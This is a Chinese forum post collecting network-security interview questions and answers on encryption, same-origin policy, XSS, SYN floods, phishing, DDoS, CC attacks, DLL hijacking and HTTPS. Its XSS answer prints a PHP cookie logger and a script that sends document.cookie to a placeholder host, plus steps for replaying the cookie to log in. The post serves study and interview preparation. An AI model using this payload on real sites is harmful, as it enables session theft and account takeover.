依星源码资源网,依星资源网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

【好消息,好消息,好消息】VIP会员可以发表文章赚积分啦 !
查看: 310|回复: 0

百度【搞定网络协议】之网络安全面试题

[复制链接] 主动推送

1万

主题

1万

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
12071
发表于 2024-3-27 09:47:32 | 显示全部楼层 |阅读模式
在面试时,网络安全也会被经常问到,至少要知道常见的攻击,以及防
御措施。在这里 Mark 下,不做深入分析。 对称加密和非对称加密
对称加密:加解密用同一密钥,密钥维护复杂 n(n-1)/2,不适合互联网传输
密钥,加解密效率高。应用于加密数据。
非对称加密:公钥推不出私钥,每个用户一个非对称密钥对就可以,适合于互联
网传输公钥,但是加密效率低,应用于数字签名及加密。 什么是同源策略?
为了防止不同域在用户浏览器中彼此干扰,浏览器对从不同来源(域)收到的内
容进行隔离。
浏览器不允许任何旧有脚本访问一个站点的 cookie,否则,会话容易被劫持。
只有发布 cookie 的站点能够访问这些 cookie,只有通过该站点返回的页面所包
含或加载的 JavaScript 才能访问 cookie。
cookie 存在哪里?可以打开吗?
C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies
工具--文件夹选项--查看--将隐藏被保护的文件的对勾去掉就会看到 cookies 文
件夹。
xss 如何盗取 cookie?
攻击者代码:
. <?php
.
. $cookie=$_GET['cookie'];
.
. $time=date('Y-m-d g:i:s');
.
. $referer=getenv('HTTP_REFERER');
.
. $cookietxt=fopen('cookie.txt','a');
.
. fwrite($cookietxt,"time:".$time." cookie:".$cookie."
referer:".$referer.""); 注意双引号,容易出错
.
. fclose($cookietxt);
.
. ?>
. 脚本端:
. <script>
.
. document.write('<img
src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0
border=0 />');
.
. </script>
. 获取到 cookie 后,用 firebug 找到 cookie,新建 cookie
加入 cookie,用 referer 来提交,无需输入帐号密码直接登录进去!
xss 有 cookie 一定可以无用户名密码登录吗?
基本可以。因为把 cookie 的值给浏览器,浏览器去访问页面会用已有的
cookie 去访问,如果 cookie 有效,就会直接进去。
xss 如何防御?
1.对前端输入做过滤和编码:
 比如只允许输入指定类型的字符,比如电话号格式,注册用户名限制等,
输入检查需要在服务器端完成,在前端完成的限制是容易绕过的;
 对特殊字符进行过滤和转义;
2.对输出做过滤和编码:在变量值输出到前端的 HTML 时进行编码和转义;
3.给关键 cookie 使用 http-only。
SYN 攻击原理
SYN 攻击属于 DOS 攻击的一种,它利用 TCP 协议缺陷,通过发送大量
的半连接请求,耗费 CPU 和内存资源。
SYN 攻击除了能影响主机外,还可以危害路由器、防火墙等网络系统,
事实上 SYN 攻击并不管目标是什么系统,只要这些系统打开 TCP 服务就可以实
施。服务器接收到连接请求(SYN=1),将此信息加入未连接队列,并发送请
求包给客户(syn=k,ack=j+1),此时进入 SYN_RECV 状态。当服务器未收到
客户端的确认包时,重发请求包,一直到超时,才将此条目从未连接队列删除。
配合 IP 欺骗,SYN 攻击能达到很好的效果,通常,客户端在短时间内伪造大量
不存在的 IP 地址,向服务器不断地发送 syn 包,服务器回复确认包,并等待客
户的确认,由于源地址是不存在的,服务器需要不断的重发直至超时,这些伪造
的 SYN 包将长时间占用未连接队列,正常的 SYN 请求被丢弃,目标系统运行
缓慢,严重者引起网络堵塞甚至系统瘫痪。 什么是网络钓鱼?
网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾
邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、ATMPIN 码或
信用卡详细信息)的一种攻击方式。
最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的
网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通
常这个攻击过程不会让受害者警觉。
它常常导引用户到 URL 与接口外观与真正网站几无二致的假冒网站输入
个人数据。就算使用强式加密的 SSL 服务器认证,要侦测网站是否仿冒实际上
仍很困难。网钓是一种利用社会工程技术来愚弄用户的实例。它凭恃的是现行网
络安全技术的低亲和度。
DDOS
分布式拒绝服务(DDoSistributed Denial ofService)攻击指借助于客户/
服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动
DDoS 攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃
帐号将 DDoS 主控程序安装在一个计算机上,在一个设定的时间主控程序将与
大量代理程序通讯,代理程序已经被安装在网络上的许多计算机上。代理程序收
到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百
上千次代理程序的运行。 什么是 CC 攻击?
这个也是知道一些,知道他是 DDos 的变种,正常请求伪造,服务器资
源耗尽,最终还是看看百科答案吧:CC 攻击是 DDOS(分布式拒绝服务)的一
种,相比其它的 DDOS 攻击 CC 似乎更有技术含量一些。这种攻击你见不到真
实源 IP,见不到特别大的异常流量,但造成服务器无法进行正常连接。CC 攻击
的原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器
资源耗尽,一直到宕机崩溃。CC 主要是用来攻击页面的,每个人都有这样的体
验:当一个网页访问的人数特别多的时候,打开网页就慢了,CC 就是模拟多个
用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就是需
要大量 CPU 时间)的页面,造成服务器资源的浪费,CPU 长时间处于 100%,
永远都有处理不完的连接直至就网络拥塞,正常的访问被中止。 Web 服务器被入侵后,怎样进行排查?
最简单就是
 查看下 web 服务器日志
 看看有没有异常端口开放
 使用安全狗等服务器安全软件清扫
dll 文件是什么意思,有什么用?
DLL(Dynamic Link Library)文件,即动态链接库,也有人称作应用程
序拓展。
Windows 应用程序中,实行了模块化设计,也就是说并不是每个应用程
序都编写完所有的功能代码,而是在运行过程中调用相应功能的 DLL,不需运行
的功能就不调用,所以大大加快了程序的加载速度和效率,其他应用程序也可以
调用相关的 DLL,这样也有利于促进代码重用以及内存使用效率,减少了资源占
用,而且程序更新时也只要更新相关的 DLL 就可以了。
要注意的是,有些病毒也会伪装成 DLL 文件,并替换系统的 DLL 文件,
需要我们防范。
DLL 劫持原理
由于输入表中只包含 DLL 名而没有它的路径名,因此加载程序必须在磁
盘上搜索 DLL 文件。首先会尝试从当前程序所在的目录加载 DLL,如果没找到,
则在 Windows 系统目录中查找,最后是在环境变量中列出的各个目录下查找。
利用这个特点,先伪造一个系统同名的 DLL,提供同样的输出表,每个输出函数
转向真正的系统 DLL。程序调用系统 DLL 时会先调用当前目录下伪造的 DLL,
完成相关功能后,再跳到系统 DLL 同名函数里执行。这个过程用个形象的词来
描述就是系统 DLL 被劫持(hijack)了。
伪造的 dll 制作好后,放到程序当前目录下,这样当原程序调用原函数时
就调用了伪造的 dll 的同名函数,进入劫持 DLL 的代码,处理完毕后,再调用原
DLL 此函数。
如何防止 DLL 劫持
DLL 劫持利用系统未知 DLL 的搜索路径方式,使得程序加载当前目录下
的系统同名 DLL。所以可以告诉系统 DLL 的位置,改变加载系统 DLL 的顺序不
是当前目录,而是直接到系统目录下查找。 Https 的作用
 内容加密建立一个信息安全通道,来保证数据传输的安全;
 身份认证确认网站的真实性
 数据完整性防止内容被第三方冒充或者篡改
HTTPS 和 HTTP 的区别:
https 协议需要到 CA 申请证书。
http 是超文本传输协议,信息是明文传输;https 则是具有安全性
的 ssl 加密传输协议。
http 和 https 使用的是完全不同的连接方式,用的端口也不一样,
前者是 80,后者是 443。
http 的连接很简单,是无状态的;HTTPS 协议是由 SSL+HTTP 协
议构建的可进行加密传输、身份认证的网络协议,比 http 协议安
全。

相关帖子

扫码关注微信公众号,及时获取最新资源信息!下载附件优惠VIP会员5折;永久VIP免费
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

免责声明:
1、本站提供的所有资源仅供参考学习使用,版权归原著所有,禁止下载本站资源参与商业和非法行为,请在24小时之内自行删除!
2、本站所有内容均由互联网收集整理、网友上传,并且以计算机技术研究交流为目的,仅供大家参考、学习,请勿任何商业目的与商业用途。
3、若您需要商业运营或用于其他商业活动,请您购买正版授权并合法使用。
4、论坛的所有内容都不保证其准确性,完整性,有效性,由于源码具有复制性,一经售出,概不退换。阅读本站内容因误导等因素而造成的损失本站不承担连带责任。
5、用户使用本网站必须遵守适用的法律法规,对于用户违法使用本站非法运营而引起的一切责任,由用户自行承担
6、本站所有资源来自互联网转载,版权归原著所有,用户访问和使用本站的条件是必须接受本站“免责声明”,如果不遵守,请勿访问或使用本网站
7、本站使用者因为违反本声明的规定而触犯中华人民共和国法律的,一切后果自己负责,本站不承担任何责任。
8、凡以任何方式登陆本网站或直接、间接使用本网站资料者,视为自愿接受本网站声明的约束。
9、本站以《2013 中华人民共和国计算机软件保护条例》第二章 “软件著作权” 第十七条为原则:为了学习和研究软件内含的设计思想和原理,通过安装、显示、传输或者存储软件等方式使用软件的,可以不经软件著作权人许可,不向其支付报酬。若有学员需要商用本站资源,请务必联系版权方购买正版授权!
10、本网站如无意中侵犯了某个企业或个人的知识产权,请来信【站长信箱312337667@qq.com】告之,本站将立即删除。
郑重声明:
本站所有资源仅供用户本地电脑学习源代码的内含设计思想和原理,禁止任何其他用途!
本站所有资源、教程来自互联网转载,仅供学习交流,不得商业运营资源,不确保资源完整性,图片和资源仅供参考,不提供任何技术服务。
本站资源仅供本地编辑研究学习参考,禁止未经资源商正版授权参与任何商业行为,违法行为!如需商业请购买各资源商正版授权
本站仅收集资源,提供用户自学研究使用,本站不存在私自接受协助用户架设游戏或资源,非法运营资源行为。
 
在线客服
点击这里给我发消息 点击这里给我发消息 点击这里给我发消息
售前咨询热线
312337667

微信扫一扫,私享最新原创实用干货

QQ|免责声明|小黑屋|依星资源网 ( 鲁ICP备2021043233号-3 )|网站地图

GMT+8, 2024-11-24 04:33

Powered by Net188.com X3.4

邮箱:312337667@qq.com 客服QQ:312337667(工作时间:9:00~21:00)

快速回复 返回顶部 返回列表